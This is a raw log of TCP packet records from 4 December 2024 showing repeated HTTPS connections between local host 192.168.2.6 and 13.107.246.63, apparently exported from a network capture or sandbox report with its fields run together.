                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.174359083 CET49901443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.194315910 CET49901443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.194349051 CET4434990113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.196297884 CET4434989913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.198064089 CET49902443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.198115110 CET4434990213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.198187113 CET49902443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.198318005 CET49902443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.198326111 CET4434990213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.199322939 CET4434989913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.199374914 CET49899443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.199944973 CET49899443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.199968100 CET4434989913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.199980021 CET49899443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.199985981 CET4434989913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.204206944 CET49903443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.204237938 CET4434990313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.204299927 CET49903443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.206429005 CET49903443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.206445932 CET4434990313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.417877913 CET4434990013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.443345070 CET49900443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.443393946 CET4434990013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.443900108 CET49900443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.443907976 CET4434990013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.856838942 CET4434989713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.859999895 CET4434989713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.860055923 CET49897443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.863584042 CET49897443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.863617897 CET4434989713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.863631010 CET49897443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.863636971 CET4434989713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.868397951 CET49904443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.868437052 CET4434990413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.868494034 CET49904443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.869118929 CET49904443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.869132996 CET4434990413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.870601892 CET4434990013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.873445034 CET4434990013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.873502970 CET49900443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.873514891 CET4434990013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.873558998 CET49900443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.873591900 CET49900443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.873609066 CET4434990013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.873622894 CET49900443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.873626947 CET4434990013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.876214027 CET49905443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.876255035 CET4434990513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.876321077 CET49905443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.876460075 CET49905443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:31.876473904 CET4434990513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:32.944629908 CET4434990313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:32.947448969 CET49903443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:32.947475910 CET4434990313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:32.947956085 CET49903443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:32.947962046 CET4434990313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:32.992450953 CET4434990113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.016829967 CET49901443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.016880035 CET4434990113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.017337084 CET49901443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.017343998 CET4434990113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.387234926 CET4434990313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.390623093 CET4434990313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.390719891 CET49903443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.448435068 CET49903443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.448479891 CET4434990313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.448498011 CET49903443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.448504925 CET4434990313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.453701019 CET4434990113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.456892014 CET4434990113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.456990957 CET49901443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.656102896 CET49901443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.656147003 CET4434990113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.656164885 CET49901443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.656172037 CET4434990113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.680859089 CET4434990413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.692744017 CET4434990213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.700053930 CET4434990513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.723773956 CET49904443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.783354044 CET49902443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.783377886 CET49905443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.903939009 CET49906443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.904002905 CET4434990613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.904083014 CET49906443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.905009031 CET49904443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.905029058 CET4434990413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.905498981 CET49904443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.905504942 CET4434990413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.918483973 CET49902443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.918540001 CET4434990213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.918951035 CET49902443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.918958902 CET4434990213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.919176102 CET49905443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.919229984 CET4434990513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.919502020 CET49905443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.919509888 CET4434990513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.944346905 CET49906443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.944370031 CET4434990613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.956187963 CET49907443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.956254959 CET4434990713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.956331015 CET49907443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.956481934 CET49907443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:33.956496000 CET4434990713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:34.330012083 CET4434990413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:34.330105066 CET4434990413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:34.330184937 CET49904443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:34.330846071 CET49904443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:34.330869913 CET4434990413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:34.330883026 CET49904443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:34.330888987 CET4434990413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:34.335599899 CET49908443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:34.335654020 CET4434990813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:34.335727930 CET49908443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:34.335891962 CET49908443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:34.335907936 CET4434990813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:34.351893902 CET4434990513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:34.351934910 CET4434990513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:34.351984978 CET49905443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:34.351994991 CET4434990513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:34.352037907 CET49905443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:34.352237940 CET49905443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:34.352237940 CET49905443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:34.352262020 CET4434990513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:34.352272034 CET4434990513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:34.355751038 CET49909443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:34.355813026 CET4434990913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:34.355875969 CET49909443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:34.356252909 CET49909443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:34.356265068 CET4434990913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:35.688570023 CET4434990713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:35.689728975 CET49907443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:35.689773083 CET4434990713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:35.690048933 CET49907443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:35.690053940 CET4434990713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:35.800673962 CET4434990613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:35.803916931 CET49906443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:35.803916931 CET49906443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:35.803951025 CET4434990613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:35.803970098 CET4434990613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.128478050 CET4434990813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.131870031 CET49908443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.131870031 CET49908443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.131895065 CET4434990813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.131911993 CET4434990813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.134505033 CET4434990713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.134572029 CET4434990713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.134804964 CET49907443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.134860992 CET49907443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.134860992 CET49907443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.134881020 CET4434990713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.134890079 CET4434990713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.137803078 CET49910443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.137835026 CET4434991013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.138092041 CET49910443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.138092041 CET49910443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.138123989 CET4434991013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.148932934 CET4434990913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.150028944 CET49909443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.150028944 CET49909443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.150052071 CET4434990913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.150065899 CET4434990913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.261261940 CET4434990613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.265213013 CET4434990613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.265391111 CET49906443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.265434027 CET49906443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.265434027 CET49906443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.265449047 CET4434990613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.265460968 CET4434990613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.269746065 CET49911443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.269798994 CET4434991113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.269897938 CET49911443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.270114899 CET49911443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.270131111 CET4434991113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.434665918 CET4434990213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.438102007 CET4434990213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.438179970 CET4434990213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.438247919 CET49902443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.438328028 CET49902443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.438348055 CET4434990213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.438363075 CET49902443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.438368082 CET4434990213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.442030907 CET49912443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.442065001 CET4434991213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.442167997 CET49912443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.442296028 CET49912443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.442303896 CET4434991213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.583519936 CET4434990813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.586765051 CET4434990813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.586813927 CET4434990813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.586854935 CET49908443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.586886883 CET49908443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.586996078 CET49908443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.587007999 CET4434990813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.587022066 CET49908443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.587025881 CET4434990813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.590354919 CET49913443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.590401888 CET4434991313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.590502024 CET49913443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.590657949 CET49913443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.590672016 CET4434991313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.600125074 CET4434990913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.604186058 CET4434990913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.606934071 CET49909443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.607276917 CET49909443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.607294083 CET4434990913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.607342958 CET49909443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.607347012 CET4434990913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.610363007 CET49914443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.610414982 CET4434991413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.610734940 CET49914443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.610734940 CET49914443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:36.610769033 CET4434991413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.126637936 CET4434991113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.127418995 CET49911443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.127449989 CET4434991113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.127896070 CET49911443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.127902985 CET4434991113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.351953030 CET4434991413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.352569103 CET49914443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.352607965 CET4434991413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.353064060 CET49914443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.353070021 CET4434991413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.388489008 CET4434991313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.389117956 CET49913443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.389141083 CET4434991313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.389564991 CET49913443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.389573097 CET4434991313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.588963032 CET4434991113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.589056015 CET4434991113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.589150906 CET49911443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.589371920 CET49911443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.589396954 CET4434991113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.589409113 CET49911443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.589416027 CET4434991113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.594291925 CET49915443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.594345093 CET4434991513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.594415903 CET49915443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.594615936 CET49915443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.594625950 CET4434991513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.680845976 CET4434991213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.681535959 CET49912443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.681571007 CET4434991213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.681993008 CET49912443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.681998014 CET4434991213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.796035051 CET4434991413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.799083948 CET4434991413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.799186945 CET49914443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.799226999 CET49914443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.799252987 CET4434991413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.799266100 CET49914443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.799271107 CET4434991413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.802370071 CET49916443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.802429914 CET4434991613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.802504063 CET49916443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.802661896 CET49916443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:38.802680969 CET4434991613.107.246.63192.168.2.6
